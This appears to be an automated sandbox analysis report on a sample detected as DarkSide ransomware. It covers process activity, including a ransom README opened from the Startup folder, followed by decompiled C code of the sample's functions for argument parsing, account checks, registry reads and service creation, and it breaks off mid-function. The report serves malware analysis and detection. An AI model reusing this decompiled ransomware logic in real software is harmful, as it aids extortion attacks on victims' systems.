                                                                                      Imagebase:0x7ff641cd0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: svchost.exe PID: 5892 Parent PID: 560

                                                                                      General

                                                                                      Start time:06:16:46
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                      Imagebase:0x7ff641cd0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: svchost.exe PID: 5408 Parent PID: 560

                                                                                      General

                                                                                      Start time:06:16:48
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k unistacksvcgroup
                                                                                      Imagebase:0x7ff641cd0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: svchost.exe PID: 3996 Parent PID: 560

                                                                                      General

                                                                                      Start time:06:16:48
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservice -p -s CDPSvc
                                                                                      Imagebase:0x7ff641cd0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: svchost.exe PID: 5968 Parent PID: 560

                                                                                      General

                                                                                      Start time:06:16:50
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc
                                                                                      Imagebase:0x7ff641cd0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: svchost.exe PID: 6248 Parent PID: 560

                                                                                      General

                                                                                      Start time:06:16:50
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k NetworkService -p
                                                                                      Imagebase:0x7ff641cd0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: SgrmBroker.exe PID: 6356 Parent PID: 560

                                                                                      General

                                                                                      Start time:06:16:51
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\SgrmBroker.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\SgrmBroker.exe
                                                                                      Imagebase:0x7ff780c50000
                                                                                      File size:163336 bytes
                                                                                      MD5 hash:D3170A3F3A9626597EEE1888686E3EA6
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: svchost.exe PID: 6388 Parent PID: 560

                                                                                      General

                                                                                      Start time:06:16:52
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc
                                                                                      Imagebase:0x7ff641cd0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: svchost.exe PID: 6664 Parent PID: 560

                                                                                      General

                                                                                      Start time:06:17:01
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\svchost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                      Imagebase:0x7ff641cd0000
                                                                                      File size:51288 bytes
                                                                                      MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: MpCmdRun.exe PID: 6076 Parent PID: 6388

                                                                                      General

                                                                                      Start time:06:17:53
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable
                                                                                      Imagebase:0x7ff7ab9a0000
                                                                                      File size:455656 bytes
                                                                                      MD5 hash:A267555174BFA53844371226F482B86B
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: conhost.exe PID: 5448 Parent PID: 6076

                                                                                      General

                                                                                      Start time:06:17:55
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff774ee0000
                                                                                      File size:625664 bytes
                                                                                      MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:false
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high

                                                                                      Chronological Activities

                                                                                      Analysis Process: notepad.exe PID: 7048 Parent PID: 3292

                                                                                      General

                                                                                      Start time:06:18:14
                                                                                      Start date:12/05/2021
                                                                                      Path:C:\Windows\System32\notepad.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:'C:\Windows\system32\NOTEPAD.EXE' C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\README.2c9ccbf3.TXT
                                                                                      Imagebase:0x7ff6a7f60000
                                                                                      File size:245760 bytes
                                                                                      MD5 hash:BB9A06B8F2DD9D24C77F389D7B2B58D2
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_DarkSide, Description: Yara detected DarkSide Ransomware, Source: 00000016.00000002.505242943.0000019FB6B02000.00000004.00000020.sdmp, Author: Joe Security

                                                                                      Chronological Activities

                                                                                      Disassembly

                                                                                      Code Analysis

                                                                                      Reset < >

                                                                                        Analysis Process: P3FwQWmwUM.exe PID: 5976 Parent PID: 5876 P3FwQWmwUM.exeCOMMON

                                                                                        Executed Functions

                                                                                        Function 0040911D, Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 179COMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E0040911D(void* __fp0) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* _t29;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t37;
				long _t38;
				void* _t48;
				void* _t49;
				void* _t54;
				intOrPtr* _t56;
				void* _t57;
				void* _t62;
				void* _t63;
				intOrPtr* _t65;
				intOrPtr* _t66;
				void* _t68;
				void* _t69;
				void* _t72;

				_t72 = __fp0;
				_t29 = E004018D1(); // executed
				E00402A44(_t29); // executed
				if( *0x40f595 == 0) {
					L3:
					E00401E1B(".2c9ccbf3"); // executed
					_t69 = CommandLineToArgvW( *0x40f5e2,  &_v12);
					__eflags = _t69;
					if(_t69 == 0) {
						L12:
						_t34 = E00401EAE();
						__eflags = _t34;
						if(_t34 != 0) {
							L16:
							_t35 = E00401EBC(); // executed
							__eflags = _t35;
							if(_t35 != 0) {
								 *0x40f5ea = E004022A9();
								E0040318A();
							}
							__eflags =  *0x40f592;
							if( *0x40f592 != 0) {
								 *0x40f5e6 = E0040221B();
							}
							__eflags = _v12 - 3;
							if(_v12 != 3) {
								__eflags = _v12 - 2;
								if(_v12 != 2) {
									goto L32;
								} else {
									_t54 = E00408BD6( *((intOrPtr*)(_t69 + 4)));
									__eflags =  *0x40f5e6;
									if( *0x40f5e6 != 0) {
										return NtClose( *0x40f5e6);
									}
									return _t54; // executed
								}
							} else {
								_t56 =  *((intOrPtr*)(_t69 + 4));
								__eflags =  *_t56 - 0x70002d;
								if( *_t56 != 0x70002d) {
									L27:
									L32:
									_t36 = E00401EBC(); // executed
									__eflags = _t36;
									if(_t36 == 0) {
										_t37 = E00401EAE();
										__eflags = _t37;
										if(_t37 == 0) {
											goto L38;
										} else {
											E00402742(".2c9ccbf3"); // executed
											_t48 = E004026A6(".2c9ccbf3"); // executed
											return _t48;
										}
									} else {
										_t49 = E00402627(".2c9ccbf3");
										__eflags = _t49;
										if(_t49 == 0) {
											 *0x40f5ea = E004022A9();
											E0040318A();
											L38:
											__eflags = _t69;
											if(_t69 != 0) {
												RtlFreeHeap( *0x40f5d6, 0, _t69);
											}
											__eflags =  *0x40f5a3;
											if( *0x40f5a3 == 0) {
												L44:
												_t38 = E00409042(_t72);
												__eflags =  *0x40f5a3;
												if( *0x40f5a3 != 0) {
													__eflags = _v8;
													if(_v8 != 0) {
														ReleaseMutex(_v8);
														_t38 = NtClose(_v8);
													}
												}
												__eflags =  *0x40f5e6;
												if( *0x40f5e6 != 0) {
													_t38 = NtClose( *0x40f5e6);
												}
												__eflags =  *0x40f5ea;
												if( *0x40f5ea != 0) {
													_t38 = NtClose( *0x40f5ea);
												}
												__eflags =  *0x40f598;
												if( *0x40f598 != 0) {
													return E00403D8F();
												}
												return _t38;
											} else {
												_v16 = E00403CF8();
												_v8 = OpenMutexW(0x100000, 0, _v16);
												__eflags = _v8;
												if(_v8 == 0) {
													_v8 = CreateMutexW(0, 1, _v16);
													E00401A1A( *0x40f5d6, 0, _v16);
													goto L44;
												} else {
													return NtClose(_v8);
												}
											}
										} else {
											E00402A1F(".2c9ccbf3");
											return E00402742(".2c9ccbf3");
										}
									}
								} else {
									__eflags =  *((intOrPtr*)(_t56 + 4)) - 0x740061;
									if( *((intOrPtr*)(_t56 + 4)) != 0x740061) {
										goto L27;
									} else {
										__eflags =  *((intOrPtr*)(_t56 + 8)) - 0x68;
										if( *((intOrPtr*)(_t56 + 8)) != 0x68) {
											goto L27;
										} else {
											_t57 = E00408BD6( *((intOrPtr*)(_t69 + 8)));
											__eflags =  *0x40f5e6;
											if( *0x40f5e6 != 0) {
												return NtClose( *0x40f5e6);
											}
											return _t57;
										}
									}
								}
							}
						} else {
							_t62 = E004016D2();
							__eflags = _t62 - 0x3c;
							if(_t62 <= 0x3c) {
								goto L16;
							} else {
								_t63 = E004020A3();
								__eflags = _t63;
								if(_t63 == 0) {
									goto L16;
								} else {
									return E00402581(); // executed
								}
							}
						}
					} else {
						__eflags = _v12 - 5;
						if(_v12 != 5) {
							goto L12;
						} else {
							_t65 =  *((intOrPtr*)(_t69 + 4));
							__eflags =  *_t65 - 0x77002d;
							if( *_t65 != 0x77002d) {
								goto L12;
							} else {
								__eflags =  *((intOrPtr*)(_t65 + 4)) - 0x72006f;
								if( *((intOrPtr*)(_t65 + 4)) != 0x72006f) {
									goto L12;
								} else {
									__eflags =  *((intOrPtr*)(_t65 + 8)) - 0x6b;
									if( *((intOrPtr*)(_t65 + 8)) != 0x6b) {
										goto L12;
									} else {
										_t66 =  *((intOrPtr*)(_t69 + 0xc));
										__eflags =  *_t66 - 0x70002d;
										if( *_t66 != 0x70002d) {
											goto L12;
										} else {
											__eflags =  *((intOrPtr*)(_t66 + 4)) - 0x740061;
											if( *((intOrPtr*)(_t66 + 4)) != 0x740061) {
												goto L12;
											} else {
												__eflags =  *((intOrPtr*)(_t66 + 8)) - 0x68;
												if(__eflags != 0) {
													goto L12;
												} else {
													return E00408F5B(__eflags,  *((intOrPtr*)(_t69 + 8)),  *((intOrPtr*)(_t69 + 0x10)));
												}
											}
										}
									}
								}
							}
						}
					}
				} else {
					_t68 = E00402E44();
					if(_t68 == 0) {
						goto L3;
					} else {
						return _t68;
					}
				}
			}
























                                                                                        0x0040911d
                                                                                        0x00409123
                                                                                        0x00409128
                                                                                        0x00409134
                                                                                        0x00409143
                                                                                        0x00409148
                                                                                        0x0040915d
                                                                                        0x0040915f
                                                                                        0x00409161
                                                                                        0x004091ac
                                                                                        0x004091ac
                                                                                        0x004091b1
                                                                                        0x004091b3
                                                                                        0x004091d1
                                                                                        0x004091d1
                                                                                        0x004091d6
                                                                                        0x004091d8
                                                                                        0x004091df
                                                                                        0x004091e4
                                                                                        0x004091e4
                                                                                        0x004091e9
                                                                                        0x004091f0
                                                                                        0x004091f7
                                                                                        0x004091f7
                                                                                        0x004091fc
                                                                                        0x00409200
                                                                                        0x0040923f
                                                                                        0x00409243
                                                                                        0x00000000
                                                                                        0x00409245
                                                                                        0x00409248
                                                                                        0x0040924d
                                                                                        0x00409254
                                                                                        0x00000000
                                                                                        0x0040925c
                                                                                        0x00409265
                                                                                        0x00409265
                                                                                        0x00409202
                                                                                        0x00409202
                                                                                        0x00409205
                                                                                        0x0040920b
                                                                                        0x0040923d
                                                                                        0x00409266
                                                                                        0x00409266
                                                                                        0x0040926b
                                                                                        0x0040926d
                                                                                        0x004092a6
                                                                                        0x004092ab
                                                                                        0x004092ad
                                                                                        0x00000000
                                                                                        0x004092af
                                                                                        0x004092b4
                                                                                        0x004092be
                                                                                        0x004092c6
                                                                                        0x004092c6
                                                                                        0x0040926f
                                                                                        0x00409274
                                                                                        0x00409279
                                                                                        0x0040927b
                                                                                        0x0040929a
                                                                                        0x0040929f
                                                                                        0x004092c7
                                                                                        0x004092c7
                                                                                        0x004092c9
                                                                                        0x004092d4
                                                                                        0x004092d4
                                                                                        0x004092da
                                                                                        0x004092e1
                                                                                        0x00409331
                                                                                        0x00409331
                                                                                        0x00409336
                                                                                        0x0040933d
                                                                                        0x0040933f
                                                                                        0x00409343
                                                                                        0x00409348
                                                                                        0x00409351
                                                                                        0x00409351
                                                                                        0x00409343
                                                                                        0x00409357
                                                                                        0x0040935e
                                                                                        0x00409366
                                                                                        0x00409366
                                                                                        0x0040936c
                                                                                        0x00409373
                                                                                        0x0040937b
                                                                                        0x0040937b
                                                                                        0x00409381
                                                                                        0x00409388
                                                                                        0x00000000
                                                                                        0x0040938a
                                                                                        0x00409392
                                                                                        0x004092e3
                                                                                        0x004092e8
                                                                                        0x004092fb
                                                                                        0x004092fe
                                                                                        0x00409302
                                                                                        0x0040931e
                                                                                        0x0040932c
                                                                                        0x00000000
                                                                                        0x00409304
                                                                                        0x00409310
                                                                                        0x00409310
                                                                                        0x00409302
                                                                                        0x0040927d
                                                                                        0x00409282
                                                                                        0x00409294
                                                                                        0x00409294
                                                                                        0x0040927b
                                                                                        0x0040920d
                                                                                        0x0040920d
                                                                                        0x00409214
                                                                                        0x00000000
                                                                                        0x00409216
                                                                                        0x00409216
                                                                                        0x0040921a
                                                                                        0x00000000
                                                                                        0x0040921c
                                                                                        0x0040921f
                                                                                        0x00409224
                                                                                        0x0040922b
                                                                                        0x00000000
                                                                                        0x00409233
                                                                                        0x0040923c
                                                                                        0x0040923c
                                                                                        0x0040921a
                                                                                        0x00409214
                                                                                        0x0040920b
                                                                                        0x004091b5
                                                                                        0x004091b5
                                                                                        0x004091ba
                                                                                        0x004091bd
                                                                                        0x00000000
                                                                                        0x004091bf
                                                                                        0x004091bf
                                                                                        0x004091c4
                                                                                        0x004091c6
                                                                                        0x00000000
                                                                                        0x004091c8
                                                                                        0x004091d0
                                                                                        0x004091d0
                                                                                        0x004091c6
                                                                                        0x004091bd
                                                                                        0x00409163
                                                                                        0x00409163
                                                                                        0x00409167
                                                                                        0x00000000
                                                                                        0x00409169
                                                                                        0x00409169
                                                                                        0x0040916c
                                                                                        0x00409172
                                                                                        0x00000000
                                                                                        0x00409174
                                                                                        0x00409174
                                                                                        0x0040917b
                                                                                        0x00000000
                                                                                        0x0040917d
                                                                                        0x0040917d
                                                                                        0x00409181
                                                                                        0x00000000
                                                                                        0x00409183
                                                                                        0x00409183
                                                                                        0x00409186
                                                                                        0x0040918c
                                                                                        0x00000000
                                                                                        0x0040918e
                                                                                        0x0040918e
                                                                                        0x00409195
                                                                                        0x00000000
                                                                                        0x00409197
                                                                                        0x00409197
                                                                                        0x0040919b
                                                                                        0x00000000
                                                                                        0x0040919d
                                                                                        0x004091ab
                                                                                        0x004091ab
                                                                                        0x0040919b
                                                                                        0x00409195
                                                                                        0x0040918c
                                                                                        0x00409181
                                                                                        0x0040917b
                                                                                        0x00409172
                                                                                        0x00409167
                                                                                        0x00409136
                                                                                        0x00409136
                                                                                        0x0040913d
                                                                                        0x00000000
                                                                                        0x00409142
                                                                                        0x00409142
                                                                                        0x00409142
                                                                                        0x0040913d

                                                                                        APIs
                                                                                          • Part of subcall function 00402A44: RtlAllocateHeap.NTDLL(00000008,?), ref: 00402A69
                                                                                          • Part of subcall function 00402A44: memcpy.NTDLL(00000000,00410030,?,?,?,?,?,?,00000000), ref: 00402A88
                                                                                          • Part of subcall function 00402A44: RtlAllocateHeap.NTDLL(00000008,00000000,00000000), ref: 00402AAD
                                                                                          • Part of subcall function 00402A44: memcpy.NTDLL(0040F470,00000000,00000100,00000000,00000000,?,?,00000000), ref: 00402AE2
                                                                                          • Part of subcall function 00402A44: memcpy.NTDLL(0601ac206b9e361,00000000,00000020), ref: 00402AFB
                                                                                          • Part of subcall function 00402A44: memcpy.NTDLL(0040F590,?,00000016), ref: 00402B0F
                                                                                          • Part of subcall function 00402A44: strlen.NTDLL ref: 00402B25
                                                                                          • Part of subcall function 00402A44: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402B37
                                                                                          • Part of subcall function 00402A44: strlen.NTDLL ref: 00402B62
                                                                                          • Part of subcall function 00402A44: RtlAllocateHeap.NTDLL(00000008,00000000), ref: 00402B74
                                                                                        • CommandLineToArgvW.SHELL32(?,.2c9ccbf3), ref: 00409157
                                                                                          • Part of subcall function 00402E44: NtQueryInstallUILanguage.NTDLL(?), ref: 00402E53
                                                                                          • Part of subcall function 00402E44: NtQueryDefaultUILanguage.NTDLL(?), ref: 00402E60
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: AllocateHeapmemcpy$LanguageQuerystrlen$ArgvCommandDefaultInstallLine
                                                                                        • String ID: .2c9ccbf3
                                                                                        • API String ID: 971990139-3269262987
                                                                                        • Opcode ID: 4c89be0c7d23382072414fccc67b5b002bd0ec496e2fabd26ee87c507b17e861
                                                                                        • Instruction ID: 2464313ce2134e79abafbdac667b0b17a2fc402787c8f680ac349fb58c25edf5
                                                                                        • Opcode Fuzzy Hash: 4c89be0c7d23382072414fccc67b5b002bd0ec496e2fabd26ee87c507b17e861
                                                                                        • Instruction Fuzzy Hash: 7F517E30A04205FAEF31AFA1EE4A72A3764AB01305F0445BBE804765E3DB7D4D98CA5E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401EBC, Relevance: 15.1, APIs: 10, Instructions: 103nativememoryCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 18%
                                                                                        			E00401EBC() {
				void* _v8;
				union _SID_NAME_USE _v12;
				long _v16;
				long _v20;
				short _v148;
				short _v276;
				char _v280;
				void* _v324;
				void* _t23;
				int _t30;
				union _SID_NAME_USE _t43;
				void* _t44;
				void* _t45;

				_t43 = 0;
				_push( &_v8);
				_push(8);
				_push(0xffffffff);
				if( *0x40f6e4() != 0) {
					L11:
					return _t43;
				}
				_t23 =  *0x40f6d0(_v8, 1,  &_v324, 0x2c,  &_v280); // executed
				if(_t23 == 0) {
					_v16 = 0x80;
					_v20 = 0x80;
					_v12 = 1;
					_t30 = LookupAccountSidW(0, _v324,  &_v148,  &_v16,  &_v276,  &_v20,  &_v12); // executed
					if(_t30 != 0) {
						_t44 = E00401D08(0x40ced3);
						_push(_t44);
						_push( &_v276);
						if( *0x40f694() != 0) {
							RtlFreeHeap( *0x40f5d6, 0, _t44);
							_t45 = E00401D08(0x40cef1);
							_push(_t45);
							_push( &_v276);
							if( *0x40f694() != 0) {
								RtlFreeHeap( *0x40f5d6, 0, _t45);
								_t45 = E00401D08(0x40cf0d);
								_push(_t45);
								_push( &_v276);
								if( *0x40f694() == 0) {
									_t43 = 1;
								}
							} else {
								_t43 = 1;
							}
						} else {
							_t43 = 1;
						}
						RtlFreeHeap( *0x40f5d6, 0, _t45);
					}
				}
				NtClose(_v8);
				goto L11;
			}
















                                                                                        0x00401eca
                                                                                        0x00401ecf
                                                                                        0x00401ed0
                                                                                        0x00401ed2
                                                                                        0x00401edc
                                                                                        0x00401ff8
                                                                                        0x00402002
                                                                                        0x00402002
                                                                                        0x00401ef7
                                                                                        0x00401eff
                                                                                        0x00401f05
                                                                                        0x00401f0c
                                                                                        0x00401f13
                                                                                        0x00401f3e
                                                                                        0x00401f46
                                                                                        0x00401f56
                                                                                        0x00401f58
                                                                                        0x00401f5f
                                                                                        0x00401f6b
                                                                                        0x00401f7d
                                                                                        0x00401f8d
                                                                                        0x00401f8f
                                                                                        0x00401f96
                                                                                        0x00401fa2
                                                                                        0x00401fb4
                                                                                        0x00401fc4
                                                                                        0x00401fc6
                                                                                        0x00401fcd
                                                                                        0x00401fd9
                                                                                        0x00401fdb
                                                                                        0x00401fdb
                                                                                        0x00401fa4
                                                                                        0x00401fa4
                                                                                        0x00401fa4
                                                                                        0x00401f6d
                                                                                        0x00401f6d
                                                                                        0x00401f6d
                                                                                        0x00401fe9
                                                                                        0x00401fe9
                                                                                        0x00401f46
                                                                                        0x00401ff2
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • NtOpenProcessToken.NTDLL(000000FF,00000008,004091D6), ref: 00401ED4
                                                                                        • NtQueryInformationToken.NTDLL(004091D6,00000001,?,0000002C,?), ref: 00401EF7
                                                                                        • LookupAccountSidW.ADVAPI32(00000000,?,?,00000080,?,00000080,00000001), ref: 00401F3E
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • _wcsicmp.NTDLL ref: 00401F60
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401F7D
                                                                                        • _wcsicmp.NTDLL ref: 00401F97
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401FE9
                                                                                        • NtClose.NTDLL(004091D6), ref: 00401FF2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$FreeToken_wcsicmp$AccountAllocateCloseInformationLookupOpenProcessQuery
                                                                                        • String ID:
                                                                                        • API String ID: 3537576846-0
                                                                                        • Opcode ID: 2f7107606f10ce4e0a6ce4424f8ce297c7b17faf710ce58333f77acaffb5f7b9
                                                                                        • Instruction ID: f234118d78b3bf0a47ad00bc353cdcd6720114ff09e636ee104b725ace2803bf
                                                                                        • Opcode Fuzzy Hash: 2f7107606f10ce4e0a6ce4424f8ce297c7b17faf710ce58333f77acaffb5f7b9
                                                                                        • Instruction Fuzzy Hash: 4A31A672900108BBEB218B91ED45FEA777CFB44701F10017AF604F21A0EB755A498B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00401D45, Relevance: 9.1, APIs: 6, Instructions: 72registrymemorynativeCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E00401D45(void* _a4) {
				void* _v8;
				int _v12;
				int _v16;
				int _v20;
				void _v148;
				long _t19;
				long _t26;
				void* _t30;
				void* _t31;

				_v16 = 0;
				_t31 = E00401D08(0x40ce73);
				if(_t31 != 0) {
					_t19 = RegCreateKeyExW(0x80000002, _t31, 0, 0, 0, 0x20119, 0,  &_v8,  &_v20); // executed
					if(_t19 == 0) {
						_t30 = E00401D08(0x40ceb7);
						if(_t30 != 0) {
							_v12 = 1;
							_v16 = 0x80;
							_t26 = RegQueryValueExW(_v8, _t30, 0,  &_v12,  &_v148,  &_v16); // executed
							if(_t26 == 0) {
								memcpy(_a4,  &_v148, _v16);
							}
							RtlFreeHeap( *0x40f5d6, 0, _t30);
						}
						NtClose(_v8); // executed
					}
					RtlFreeHeap( *0x40f5d6, 0, _t31);
				}
				return _v16;
			}












                                                                                        0x00401d53
                                                                                        0x00401d64
                                                                                        0x00401d68
                                                                                        0x00401d89
                                                                                        0x00401d91
                                                                                        0x00401d9d
                                                                                        0x00401da1
                                                                                        0x00401da3
                                                                                        0x00401daa
                                                                                        0x00401dc6
                                                                                        0x00401dce
                                                                                        0x00401ddd
                                                                                        0x00401de3
                                                                                        0x00401def
                                                                                        0x00401def
                                                                                        0x00401df8
                                                                                        0x00401df8
                                                                                        0x00401e07
                                                                                        0x00401e07
                                                                                        0x00401e18

                                                                                        APIs
                                                                                          • Part of subcall function 00401D08: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00401D1E
                                                                                        • RegCreateKeyExW.KERNELBASE(80000002,00000000,00000000,00000000,00000000,00020119,00000000,?,?,0040CE73,?,?), ref: 00401D89
                                                                                        • RegQueryValueExW.KERNELBASE(?,00000000,00000000,00000001,?,00000080,0040CEB7), ref: 00401DC6
                                                                                        • memcpy.NTDLL(00000001,?,00000080), ref: 00401DDD
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401DEF
                                                                                        • NtClose.NTDLL(?), ref: 00401DF8
                                                                                        • RtlFreeHeap.NTDLL(00000000,00000000), ref: 00401E07
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.232418752.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.232414850.0000000000400000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232427334.000000000040A000.00000020.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232432306.000000000040B000.00000002.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232435893.000000000040C000.00000004.00020000.sdmp Download File
                                                                                        • Associated: 00000001.00000002.232440758.0000000000410000.00000008.00020000.sdmp Download File
                                                                                        Similarity
                                                                                        • API ID: Heap$Free$AllocateCloseCreateQueryValuememcpy
                                                                                        • String ID:
                                                                                        • API String ID: 2067435447-0
                                                                                        • Opcode ID: 8db4ddf0c99b9a79d8ee28e3f85468b48a9c35857356776fac1d7eb3c94bc1fa
                                                                                        • Instruction ID: 2199f7403c65914bd568681eddc08d076722dc9d6a7007461f6a1e5a918e7e9e
                                                                                        • Opcode Fuzzy Hash: 8db4ddf0c99b9a79d8ee28e3f85468b48a9c35857356776fac1d7eb3c94bc1fa
                                                                                        • Instruction Fuzzy Hash: 91214F32900218BBD7219F91ED46FAEBB7CEF40704F10407AF504B51A1D7756A189B68
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004026A6, Relevance: 7.5, APIs: 5, Instructions: 46serviceCOMMON
                                                                                        Download Yara Rule
                                                                                        C-Code - Quality: 100%
                                                                                        			E004026A6(short* _a4) {
				short _v8;
				void* _v12;
				void* _v16;
				int _t17;

				_v16 = 0;
				_v12 = 0;
				_t17 = OpenSCManagerW(0, 0, 0xf003f);
				_v12 = _t17;
				if(_v12 != 0) {
					_v8 = 0;
					_t17 = CreateServiceW(_v12, _a4, _a4, 0xf01ff, 0x110, 3, 0,  *0x40f5e2, 0, 0, 0, 0,  &_v8); // executed
					_v16 = _t17;
